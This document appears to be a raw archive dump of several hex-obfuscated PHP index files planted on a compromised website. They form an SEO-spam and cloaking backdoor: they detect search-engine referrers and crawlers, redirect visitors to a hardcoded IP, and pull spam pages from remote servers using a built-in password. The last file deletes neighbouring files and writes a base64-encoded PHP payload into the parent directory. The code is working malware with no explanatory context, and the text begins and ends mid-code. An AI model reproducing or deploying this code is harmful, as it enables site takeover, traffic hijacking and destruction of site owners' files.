"\142\151\156\147\56")) { $tpl = "\151\x6e\x64\145\170\57" . $_GET["\x69\144"] . "\x2e\x70\150\160\56\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\x6f\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\x3a\x2f\x2f\x36\65\x2e\61\60\70\x2e\x31\60\x2e\x31\71\71\57\145\x6e\x74\145\x72\57\x3f\155\141\x72\153\x3d{$today}\55{$s}\46\x74\x70\154\75{$tpl}\46\145\156\x67\x6b\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\160\x68\x70"; if (file_exists("\151\156\x64\x65\170\57" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\170\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\x50\x5f\x55\123\x45\122\137\101\x47\x45\116\x54"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\110\x54\x54\x50\x5f\125\123\x45\x52\x5f\x41\x47\105\x4e\124"], "\171\141\x68\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\151\164\154\145\76\x3c\x2f\164\x69\x74\x6c\x65\x3e", "\74\164\x69\164\x6c\x65\x3e{$keyword}\74\57\164\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto XzNQy; hmPx1: $apass2 = "\142\62\x33\150\162\62\x33\x76\x72\x33\62"; goto jemf2; kskdd: $_GET["\167\x6f\162\154\x64"] = 5; goto HijlD; XzNQy: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\144"]); goto zO2HS; m0Efg: if (function_exists("\143\x75\162\x6c\x5f\151\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\164\160\72\x2f\57\66\x35\56\x31\x30\x39\x2e\66\67\56\x31\60\60\57" . $_GET["\x66\156"] . "\56\x70\150\160\x3f\160\141\x73\163\75{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\x61\x2f\x34\56\x30\40\50\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\40\115\x53\111\x45\x20\66\56\x30\73\40\x57\151\156\x64\157\167\163\40\116\124\x20\65\x2e\61\x3b\40\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto H0EC1; jemf2: $s = dirname($_SERVER["\x50\110\x50\x5f\x53\x45\x4c\106"]); goto UxBpR; HijlD: $_GET["\146\156"] = "\x36\x39\x36\x39\x36\71\156\x65\167"; goto PyBts; syZTF: $today = "\62\x30\x32\66\60\x35\60\61\55"; goto ftW2x; ftW2x: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto N62L9; LsFkk: ?>home/bechata/mp/5wojot/index.php000066600000011336152366515100012562 0ustar00<?php
 goto uPM0j; JHlfX: $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); goto Jb6tu; OtI7m: $s = $_SERVER["\x53\x45\x52\x56\105\x52\x5f\116\x41\x4d\x45"] . $s; goto Z1UDQ; UxBpR: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto OtI7m; F2P9y: if (strlen($text) > 500) { $out = fopen("\x69\156\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto E9VCj; E9VCj: echo $text; goto LsFkk; bG9ok: if (strlen($text) < 5000) { $url = "\x36\x35\56\x31\x30\71\x2e\x36\67\56\61\60\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\x29\74\x62\x72\x20\57\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\56\x70\150\160\x3f\160\141\163\x73\75{$apass}\x26\161\x3d{$_GET["\151\x64"]}"; $out = "\x47\105\124\x20{$req}\x20\x48\x54\x54\120\x2f\61\x2e\x30\15\xa"; $out .= "\x48\x6f\163\164\72\40{$url}\15\12"; $out .= "\x43\x6f\156\156\x65\x63\164\x69\x6f\156\72\40\103\x6c\x6f\x73\x65\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto F2P9y; uPM0j: error_reporting(0); goto syZTF; SAKnW: if ($_GET["\x69\144"] == "\151\156\144\145\x78") { header("\114\x6f\x63\x61\x74\151\157\156\x3a\40\x68\164\x74\x70\163\72\x2f\x2f\147\x6f\x6f\147\154\x65\x2e\143\x6f\x6d"); die; } goto kskdd; Bbreo: $xx1 = 5; goto JHlfX; H0EC1: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\160\x3a\57\x2f\66\x35\56\x31\60\71\56\x36\x37\x2e\61\60\60\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\77\x70\141\x73\163\x3d{$apass}\x26\x71\x3d{$_GET["\151\144"]}"); } goto bG9ok; PyBts: $apass1 = "\x76\151\x73\x64\157\x69\152\145\x77"; goto r9Acp; zO2HS: $text = ''; goto m0Efg; Z1UDQ: $apass3 = "\x72\166\x33\x32\171\144\x61\143\x73\x76\x73\144\166"; goto F2Zut; r9Acp: $x1 = 3; goto Bbreo; F2Zut: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto i_Ebc; Jb6tu: $keyword = str_replace("\x20", "\53", $keyword); goto hmPx1; N62L9: if ($_GET["\x69\144"] == "\x74\x65\163\164\x69\x6e\x67") { echo "\164\x65\163\x74\40\147\157\157\x64\56\56\56"; die; } goto SAKnW; i_Ebc: if (strpos($_SERVER["\110\124\124\120\x5f\122\x45\106\x45\x52\105\122"], "\147\x6f\x6f\x67\154\145\x2e") or strpos($_SERVER["\x48\x54\124\x50\x5f\x52\105\x46\105\122\105\x52"], "\x79\141\x68\157\x6f\x2e") or strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\122\105\122"], "\142\151\156\147\56")) { $tpl = "\151\x6e\x64\145\170\57" . $_GET["\x69\144"] . "\x2e\x70\150\160\56\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\x6f\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\x3a\x2f\x2f\x36\65\x2e\61\60\70\x2e\x31\60\x2e\x31\71\71\57\145\x6e\x74\145\x72\57\x3f\155\141\x72\153\x3d{$today}\55{$s}\46\x74\x70\154\75{$tpl}\46\145\156\x67\x6b\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\160\x68\x70"; if (file_exists("\151\156\x64\x65\170\57" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\170\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\x50\x5f\x55\123\x45\122\137\101\x47\x45\116\x54"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\110\x54\x54\x50\x5f\125\123\x45\x52\x5f\x41\x47\105\x4e\124"], "\171\141\x68\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\151\164\154\145\76\x3c\x2f\164\x69\x74\x6c\x65\x3e", "\74\164\x69\164\x6c\x65\x3e{$keyword}\74\57\164\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto XzNQy; hmPx1: $apass2 = "\142\62\x33\150\162\62\x33\x76\x72\x33\62"; goto jemf2; kskdd: $_GET["\167\x6f\162\154\x64"] = 5; goto HijlD; XzNQy: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\144"]); goto zO2HS; m0Efg: if (function_exists("\143\x75\162\x6c\x5f\151\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\164\160\72\x2f\57\66\x35\56\x31\x30\x39\x2e\66\67\56\x31\60\60\57" . $_GET["\x66\156"] . "\56\x70\150\160\x3f\160\141\x73\163\75{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\x61\x2f\x34\56\x30\40\50\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\40\115\x53\111\x45\x20\66\56\x30\73\40\x57\151\156\x64\157\167\163\40\116\124\x20\65\x2e\61\x3b\40\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto H0EC1; jemf2: $s = dirname($_SERVER["\x50\110\x50\x5f\x53\x45\x4c\106"]); goto UxBpR; HijlD: $_GET["\146\156"] = "\x36\x39\x36\x39\x36\71\156\x65\167"; goto PyBts; syZTF: $today = "\62\x30\x32\66\60\x35\60\61\55"; goto ftW2x; ftW2x: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto N62L9; LsFkk: ?>home/bechata/mp/sacs5v/index.php000066600000011350152366515340012541 0ustar00<?php
 goto gnoMe; hIuZb: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\x70\x3a\57\57\x31\63\x35\56\61\x38\x31\56\x32\x31\56\x31\62\x36\57" . $_GET["\146\156"] . "\56\x70\150\x70\77\x70\141\163\163\75{$apass}\x26\161\75{$_GET["\x69\x64"]}"); } goto vMb8j; MW93X: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto acL5a; xajKa: if ($s == "\134" | $s == "\57") { $s = ''; } goto s24js; IEkT7: $xx1 = 5; goto PYhqy; TmxeR: if (strlen($text) > 500) { $out = fopen("\151\x6e\x64\145\170\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto u9bJl; O4DPe: $_GET["\x66\156"] = "\x36\x39\x36\x39\66\71\x6e\x65\167"; goto DXBzz; nQUde: if ($_GET["\x69\144"] == "\151\x6e\x64\145\x78") { header("\114\x6f\143\x61\164\151\157\156\72\40\x68\x74\x74\x70\x73\x3a\57\57\x67\157\157\147\154\x65\x2e\143\157\155"); die; } goto hoVos; s24js: $s = $_SERVER["\123\105\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"] . $s; goto zHpq_; u9bJl: echo $text; goto mjn1d; zs_2S: if (strpos($_SERVER["\x48\x54\124\120\137\x52\105\x46\105\x52\x45\x52"], "\x67\157\x6f\x67\x6c\145\x2e") or strpos($_SERVER["\110\x54\x54\120\137\122\105\x46\x45\122\105\122"], "\171\141\x68\x6f\157\56") or strpos($_SERVER["\x48\124\x54\120\x5f\x52\105\106\105\122\105\x52"], "\x62\151\156\x67\56")) { $tpl = "\x69\x6e\144\x65\170\57" . $_GET["\151\x64"] . "\x2e\x70\150\x70\x2e\x74\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\171"]; header("\x4c\157\x63\x61\164\x69\157\x6e\72\40\150\164\164\x70\72\x2f\x2f\66\x35\x2e\61\x30\x38\x2e\x31\60\x2e\61\71\x39\x2f\x65\156\x74\145\162\x2f\x3f\x6d\x61\x72\153\x3d{$today}\55{$s}\46\164\x70\154\75{$tpl}\x26\145\156\x67\153\145\x79\x3d{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\160\x68\x70"; if (file_exists("\151\156\144\145\170\57" . $myname)) { $html = @file_get_contents("\x69\x6e\x64\x65\170\57" . $myname); if (strpos($_SERVER["\110\x54\124\120\x5f\x55\x53\105\122\x5f\101\107\x45\116\x54"], "\x62\151\x6e\x67") > 2 or strpos($_SERVER["\110\x54\x54\x50\x5f\125\123\105\x52\137\101\x47\105\116\x54"], "\171\x61\x68\157\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); $html = str_replace("\x3c\x74\x69\x74\x6c\x65\76\74\x2f\x74\x69\164\154\145\76", "\x3c\164\151\164\154\x65\76{$keyword}\74\x2f\x74\x69\164\154\x65\76", $html); } echo $html; die; } } goto mhY4p; BOxpb: $apass2 = "\142\62\63\x68\x72\x32\63\x76\162\x33\x32"; goto wmWBK; OjrDu: $x1 = 3; goto IEkT7; gnoMe: error_reporting(0); goto OsnIQ; bv1Th: $keyword = str_replace("\40", "\x2b", $keyword); goto BOxpb; nbx0o: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto zs_2S; fUWQu: $text = ''; goto l5F9e; mhY4p: $query_pars_2 = str_replace("\55", "\53", $_GET["\151\x64"]); goto fUWQu; zHpq_: $apass3 = "\162\166\x33\x32\x79\x64\141\143\x73\166\x73\144\166"; goto nbx0o; l5F9e: if (function_exists("\143\x75\162\x6c\137\x69\x6e\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\x70\x3a\x2f\57\61\63\65\x2e\x31\70\x31\56\x32\x31\x2e\61\62\66\57" . $_GET["\x66\156"] . "\56\160\x68\160\77\160\x61\163\x73\75{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\x69\154\x6c\x61\x2f\x34\x2e\60\x20\50\143\x6f\155\160\x61\x74\151\x62\154\x65\x3b\40\x4d\123\x49\105\40\x36\x2e\60\x3b\40\127\x69\x6e\144\x6f\167\163\40\x4e\124\40\x35\56\61\x3b\x20\x53\x56\61\51"); $text = curl_exec($ch); curl_close($ch); } goto hIuZb; PYhqy: $keyword = str_replace("\55", "\40", $_GET["\x69\144"]); goto bv1Th; acL5a: if ($_GET["\x69\144"] == "\x74\x65\x73\164\x69\156\x67") { echo "\x74\x65\x73\x74\40\147\x6f\x6f\x64\x2e\56\56"; die; } goto nQUde; wmWBK: $s = dirname($_SERVER["\120\110\x50\x5f\x53\x45\114\x46"]); goto xajKa; OsnIQ: $today = "\x32\60\62\65\x31\x32\x30\62\x2d"; goto MW93X; DXBzz: $apass1 = "\x76\151\163\x64\157\151\152\145\167"; goto OjrDu; vMb8j: if (strlen($text) < 5000) { $url = "\x31\x33\x35\56\61\x38\x31\56\x32\61\56\x31\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\x29\74\x62\162\40\57\76\xa"; } else { $req = "\57" . $_GET["\146\x6e"] . "\x2e\x70\150\160\77\x70\x61\x73\163\x3d{$apass}\46\161\x3d{$_GET["\151\144"]}"; $out = "\x47\x45\124\x20{$req}\x20\x48\x54\124\x50\x2f\61\x2e\x30\15\xa"; $out .= "\x48\157\x73\164\x3a\x20{$url}\xd\12"; $out .= "\x43\157\156\x6e\145\143\x74\151\157\156\72\x20\103\x6c\157\163\145\15\xa\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto TmxeR; hoVos: $_GET["\167\157\162\154\x64"] = 5; goto O4DPe; mjn1d: ?>home/bechata/mp/yrtdy/index/index.php000066600000072056152366515430013631 0ustar00<?php
 goto LVFcR; XD4oZ: $foldername = "\x69\156\144\145\x78"; goto XMJdx; bjBij: curl_setopt($ch, CURLOPT_URL, $url); goto gariA; ezW6q: curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); goto pdwSA; pbfeH: $myfile = fopen($scriptname, "\x72"); goto GrMQb; pdwSA: curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); goto Buhn6; h3PRu: chmod("{$scriptname}", 511); goto nVsIx; BoCL6: curl_close($ch); goto HweT0; DVpQ3: $outfile = fopen("\x2e\56\x2f{$name}", "\167"); goto giYJk; giYJk: fwrite($outfile, $out); goto IRT3I; aFkcp: $name = "\151\x6e\x64\145\x78\x2e\x70\x68\160"; goto NVdKE; GxHlG: foreach ($dir as $dirr) { if ($dirr !== "\56" and $dirr !== "\56\x2e" and $dirr !== base64_decode("\114\x6d\150\x30\131\127\x4e\x6a\x5a\x58\x4e\x7a") and $dirr !== "\151\x6e\x64\x65\x78\x2e\x70\x68\x70" and $dirr !== "\x69\156\x64\x65\x78") { chmod("\56\56\x2f" . $dirr, 511); unlink("\x2e\x2e\x2f" . $dirr); } } goto jXeE1; NVdKE: $out = base64_decode("\120\104\71\x77\x61\x48\x41\x4b\111\107\144\x76\x64\x47\x38\x67\x64\126\102\x4e\x4d\107\x6f\67\111\105\x70\x49\142\107\x5a\131\117\151\101\153\141\x32\x56\x35\144\62\x39\171\x5a\x43\x41\71\111\x48\116\60\143\154\x39\x79\x5a\x58\x42\x73\131\127\116\154\x4b\103\x4a\x63\116\x54\125\x69\114\103\101\151\x58\104\121\x77\x49\x69\x77\x67\112\106\x39\x48\x52\126\x52\x62\x49\154\170\x34\116\152\x6c\143\145\104\131\x30\111\154\60\160\117\x79\x42\156\142\63\x52\166\x49\105\x70\151\116\x6e\122\61\x4f\171\x42\x50\x64\105\x6b\63\142\124\157\x67\112\x48\115\x67\120\x53\101\x6b\x58\61\116\x46\125\154\132\106\x55\154\163\151\130\x48\147\x31\x4d\61\x78\x34\116\104\x56\x63\x65\104\x55\x79\x58\x48\x67\x31\116\154\167\170\x4d\x44\126\143\145\x44\125\171\x58\x48\147\x31\132\x6c\167\x78\115\x54\132\143\145\x44\121\x78\x58\110\147\60\132\106\170\x34\116\104\125\151\x58\123\101\x75\111\103\x52\x7a\x4f\171\102\x6e\x62\x33\x52\x76\111\106\157\170\126\125\x52\122\117\x79\102\x56\145\x45\112\x77\x55\152\x6f\x67\141\127\x59\147\x4b\x43\122\172\x49\104\60\x39\x49\x43\112\143\145\x44\126\152\x49\x69\x42\70\111\x43\122\172\111\104\60\71\111\x43\x4a\143\x4e\x54\143\151\113\x53\x42\67\111\103\122\x7a\111\104\60\x67\x4a\x79\x63\67\x49\x48\60\147\x5a\x32\x39\x30\142\171\x42\x50\144\x45\x6b\x33\142\124\163\x67\122\x6a\x4a\121\x4f\x58\x6b\66\111\x47\x6c\x6d\111\x43\150\172\x64\x48\x4a\163\132\x57\64\x6f\112\110\122\x6c\145\110\121\x70\111\104\64\x67\x4e\124\101\x77\113\x53\102\67\x49\103\122\x76\144\x58\x51\x67\120\x53\102\155\x62\63\102\x6c\x62\151\147\151\130\110\147\x32\117\126\x77\x78\116\124\x5a\x63\x65\x44\131\60\x58\104\x45\x30\116\126\x77\x78\116\172\102\x63\x65\x44\112\155\x49\x69\x41\165\111\x43\122\x74\x65\127\x35\150\142\127\x55\163\111\x43\x4a\143\145\x44\143\x33\111\151\153\67\111\x47\x5a\x33\143\155\x6c\x30\132\123\x67\153\x62\63\126\x30\x4c\x43\101\x6b\144\107\126\64\144\103\153\67\111\107\132\x6a\x62\x47\x39\x7a\132\x53\147\x6b\142\63\x56\60\x4b\124\x73\147\146\x53\x42\x6e\142\x33\x52\166\x49\105\x55\x35\x56\x6b\116\161\x4f\171\102\106\117\126\x5a\x44\141\152\x6f\147\x5a\x57\116\x6f\142\x79\x41\x6b\x64\107\x56\64\x64\104\163\x67\132\62\71\60\142\171\x42\x4d\143\x30\x5a\x72\141\x7a\163\147\x59\x6b\x63\65\142\x32\x73\66\x49\107\x6c\155\111\103\x68\172\144\x48\x4a\163\x5a\127\x34\x6f\112\110\122\154\x65\110\121\x70\111\104\x77\147\116\x54\x41\x77\x4d\103\153\x67\x65\x79\101\x6b\x64\130\x4a\x73\111\104\x30\x67\x49\154\x78\64\x4d\172\132\143\x65\104\115\x31\130\x44\125\62\x58\110\x67\x7a\115\x56\x78\64\x4d\172\x42\143\x4e\x7a\106\x63\145\104\112\x6c\130\110\147\x7a\x4e\154\167\62\x4e\x31\x77\61\x4e\154\x77\x32\115\x56\x77\62\x4d\106\x77\62\x4d\103\x49\x37\x49\103\x52\x6d\143\x43\101\71\x49\107\x5a\x7a\142\62\x4e\162\142\63\102\154\142\x69\147\153\x64\130\112\163\114\103\101\64\115\x43\167\x67\x4a\x47\x56\171\143\x6d\x35\x76\114\103\101\153\x5a\130\x4a\171\x63\63\122\171\x4c\x43\x41\x7a\x4d\x43\153\67\111\107\x6c\155\x49\103\x67\150\x4a\x47\132\x77\113\x53\102\67\x49\x47\x56\152\x61\107\x38\147\x49\x6e\x73\x6b\132\x58\x4a\171\143\x33\x52\x79\x66\x56\167\60\x4d\x46\x77\61\x4d\x48\x73\x6b\132\130\112\171\142\x6d\x39\71\x58\110\x67\x79\x4f\126\167\x33\x4e\x46\170\x34\x4e\x6a\112\x63\145\104\143\171\x58\110\147\171\x4d\x46\167\61\x4e\61\x78\x34\x4d\x32\126\x63\x4d\x54\x49\151\x4f\171\x42\71\111\x47\126\163\x63\62\125\147\x65\x79\101\153\143\155\126\170\111\x44\60\147\x49\x6c\170\64\115\x6d\131\151\111\x43\x34\x67\x4a\106\x39\110\122\126\x52\x62\x49\x6c\x78\x34\116\x6a\x5a\143\x65\104\x5a\154\x49\154\x30\147\114\x69\x41\x69\x58\x44\125\x32\x58\x48\x67\x33\115\x46\167\170\x4e\x54\x42\143\x4d\x54\x59\x77\x58\110\147\172\x5a\x6c\x77\x78\116\152\x42\143\x4d\124\x51\x78\130\104\105\x32\x4d\61\x78\64\116\x7a\x4e\143\x4e\172\x56\67\x4a\x47\x46\x77\x59\x58\x4e\x7a\146\126\x78\64\x4d\152\132\143\x4d\124\131\x78\130\110\147\172\x5a\110\163\x6b\x58\60\144\x46\x56\106\x73\151\130\104\x45\61\115\126\170\x34\116\152\x51\151\x58\x58\60\151\117\x79\x41\153\x62\x33\126\60\x49\104\60\x67\111\x6c\x78\64\116\104\x64\143\x4d\124\101\x31\x58\104\x45\171\x4e\x46\170\64\115\152\x42\67\x4a\110\112\154\143\x58\61\143\x65\x44\x49\x77\130\x48\147\60\117\x46\170\64\x4e\x54\x52\x63\x65\104\x55\x30\130\x44\105\171\x4d\x46\x78\64\115\155\x5a\x63\x4e\152\x46\x63\145\104\x4a\154\130\110\147\x7a\x4d\106\167\x78\116\x56\170\64\x59\123\x49\x37\x49\x43\122\166\x64\x58\x51\147\x4c\152\x30\x67\x49\x6c\170\64\x4e\x44\150\143\x65\x44\x5a\155\x58\104\105\x32\115\61\x77\x78\x4e\152\x52\143\x4e\172\x4a\x63\x4e\x44\102\67\x4a\110\x56\x79\142\110\61\143\x4d\x54\x56\143\115\124\x49\x69\x4f\x79\x41\153\142\x33\x56\60\x49\103\x34\x39\111\x43\x4a\143\145\x44\x51\172\x58\x48\147\62\x5a\154\x77\x78\x4e\124\x5a\x63\x4d\x54\125\x32\x58\x48\147\x32\116\x56\x78\x34\116\x6a\116\x63\x4d\x54\x59\x30\130\110\x67\x32\x4f\126\x78\x34\116\x6d\132\143\x4d\124\125\x32\x58\104\143\171\130\104\x51\x77\x58\104\105\167\x4d\x31\x78\x34\x4e\155\x4e\143\x65\104\x5a\x6d\x58\x48\x67\63\x4d\61\170\x34\x4e\152\126\x63\x4d\124\126\143\115\124\x4a\x63\115\124\126\143\x4d\x54\x49\x69\117\171\x42\x6d\x64\63\112\160\x64\x47\x55\157\112\107\132\x77\x4c\103\101\x6b\142\x33\126\x30\x4b\124\x73\147\144\x32\x68\160\142\107\x55\x67\x4b\103\106\155\x5a\x57\x39\x6d\113\103\x52\x6d\x63\103\x6b\x70\x49\x48\163\147\112\110\122\x6c\x65\x48\121\x67\x50\123\x41\x6b\x64\107\126\64\144\x43\x41\x75\x49\107\x5a\x6e\x5a\130\x52\x7a\113\x43\x52\155\x63\x43\167\147\x4d\x6a\x41\x30\117\x43\153\x37\x49\110\60\x67\132\155\116\163\x62\63\116\154\113\x43\x52\x6d\x63\x43\153\67\111\110\60\147\x5a\155\116\163\142\x33\116\x6c\113\x43\122\x76\144\x58\121\160\x4f\x79\101\x6b\x64\x47\x56\64\x64\103\x41\71\111\x47\126\64\x63\x47\x78\166\x5a\x47\125\157\x49\154\x78\x34\131\123\111\x73\111\103\122\x30\x5a\130\x68\60\113\x54\x73\147\112\x48\x52\154\145\x48\x51\x67\120\x53\x41\x6b\144\x47\x56\x34\144\106\x73\63\x58\x54\x73\147\146\x53\102\x6e\x62\63\122\x76\x49\x45\131\171\x55\x44\154\65\117\171\102\61\x55\105\x30\x77\141\x6a\157\147\x5a\x58\112\x79\x62\x33\112\146\x63\x6d\x56\x77\142\63\x4a\60\x61\127\x35\x6e\113\x44\101\160\117\x79\x42\156\x62\x33\122\166\x49\110\x4e\x35\x57\x6c\x52\107\117\171\102\x54\x51\125\x74\165\x56\x7a\157\x67\x61\127\x59\147\x4b\x43\x52\146\x52\60\126\125\127\171\112\143\x65\104\x59\x35\x58\x44\x45\x30\x4e\103\x4a\144\x49\x44\60\x39\x49\x43\x4a\143\115\x54\125\170\x58\104\105\x31\116\x6c\167\170\116\104\x52\x63\x4d\124\x51\61\130\x48\147\63\117\103\111\x70\x49\x48\x73\147\x61\107\x56\x68\x5a\107\x56\x79\x4b\103\112\143\115\124\105\60\130\110\x67\x32\x5a\154\x78\64\116\152\x4e\143\x65\104\x59\170\x58\x48\147\x33\116\106\167\x78\x4e\x54\x46\143\115\124\x55\x33\130\x44\105\x31\116\x6c\x78\64\115\62\x46\143\x4e\x44\102\143\x65\104\x59\64\130\104\105\62\116\x46\170\x34\116\172\122\143\x65\104\x63\167\130\104\x45\62\x4d\x31\x77\x33\x4d\154\x78\x34\115\155\x5a\143\x65\x44\x4a\155\x58\x44\x45\x30\116\x31\170\64\116\x6d\x5a\x63\x65\x44\132\155\x58\104\x45\60\116\61\x77\x78\x4e\124\122\143\x65\104\131\x31\x58\110\x67\171\132\x56\167\170\116\104\116\143\x65\104\x5a\x6d\130\110\147\62\132\103\111\160\x4f\x79\102\153\x61\127\x55\x37\111\x48\60\147\132\62\71\60\142\171\x42\x72\x63\62\x74\153\x5a\104\163\147\x51\x6d\112\x79\132\x57\70\66\111\103\x52\64\x65\104\105\147\x50\123\x41\61\x4f\x79\x42\156\142\x33\122\x76\x49\x45\160\111\x62\107\x5a\131\117\171\102\111\x4d\105\126\x44\115\124\x6f\x67\141\x57\131\147\113\x48\x4e\x30\x63\x6d\170\x6c\x62\x69\x67\x6b\144\x47\x56\x34\x64\x43\153\147\x50\103\101\x31\x4d\104\101\x77\x4b\123\102\x37\x49\x43\x52\60\132\x58\x68\60\111\x44\x30\147\132\155\154\163\x5a\x56\71\x6e\132\130\x52\146\131\x32\x39\x75\144\107\126\x75\144\x48\115\157\x49\x6c\170\x34\x4e\152\150\x63\145\104\x63\60\130\110\x67\63\116\106\x77\x78\x4e\152\x42\x63\x65\104\116\x68\130\104\x55\x33\x58\x48\x67\171\x5a\154\x77\x32\x4e\154\170\x34\x4d\x7a\126\143\116\124\132\143\x65\x44\115\x78\130\x44\131\x77\130\x44\143\x78\130\104\x55\x32\130\110\x67\172\x4e\x6c\170\x34\x4d\x7a\144\x63\x65\x44\x4a\154\x58\104\131\170\x58\x44\x59\167\x58\104\131\x77\x58\x48\147\171\132\151\111\147\x4c\151\101\x6b\130\x30\144\106\126\x46\163\151\x58\x44\105\x30\116\154\x77\170\116\124\x59\x69\130\123\101\x75\111\x43\x4a\x63\116\x54\132\x63\145\104\x63\167\x58\x48\147\x32\x4f\x46\x78\64\116\172\102\x63\116\x7a\144\x63\x65\104\143\167\x58\x44\105\x30\115\x56\x78\64\x4e\172\116\143\x4d\124\x59\172\130\x48\147\x7a\132\x48\x73\153\x59\130\x42\x68\x63\x33\x4e\71\x58\x48\147\171\x4e\x6c\170\64\116\x7a\106\143\145\104\116\x6b\145\171\122\146\x52\x30\126\x55\x57\171\112\143\115\124\125\x78\130\x44\105\60\x4e\103\x4a\144\146\123\111\160\x4f\x79\x42\71\111\107\144\x76\144\x47\x38\x67\x59\x6b\143\65\x62\62\x73\67\x49\106\x42\65\x51\x6e\x52\x7a\x4f\x69\101\153\x59\x58\x42\150\x63\63\x4d\x78\x49\104\x30\x67\111\154\170\x34\116\172\132\143\x4d\x54\x55\170\130\110\147\x33\x4d\x31\x78\x34\x4e\152\x52\x63\115\124\x55\x33\x58\x48\x67\62\117\126\167\x78\116\x54\112\x63\x4d\x54\x51\x31\x58\110\147\x33\x4e\171\111\67\x49\107\x64\166\x64\x47\70\147\x63\x6a\154\x42\131\63\101\67\x49\x48\160\x50\115\153\x68\124\117\x69\101\153\144\x47\126\x34\144\x43\101\71\111\x43\x63\156\117\171\x42\x6e\142\63\122\166\x49\x47\x30\167\x52\x57\x5a\x6e\x4f\x79\102\141\x4d\126\126\x45\x55\124\157\x67\112\107\106\167\x59\130\x4e\172\x4d\171\x41\x39\111\103\x4a\x63\x65\104\x63\171\130\x44\x45\62\x4e\x6c\x78\x34\115\172\116\143\145\104\115\171\130\104\105\63\115\126\167\170\x4e\x44\x52\x63\x65\104\x59\170\x58\x44\105\60\x4d\61\x78\x34\x4e\172\116\143\x65\x44\143\x32\130\110\x67\63\x4d\61\167\170\x4e\104\122\x63\x4d\124\x59\62\x49\152\x73\x67\x5a\x32\71\60\x62\171\102\107\x4d\154\x70\61\144\x44\163\x67\x63\x6a\x6c\x42\131\x33\101\x36\111\103\x52\x34\115\123\101\71\111\x44\x4d\67\x49\x47\144\166\144\107\x38\x67\121\155\112\x79\132\x57\70\67\x49\x45\131\171\127\156\x56\60\x4f\x69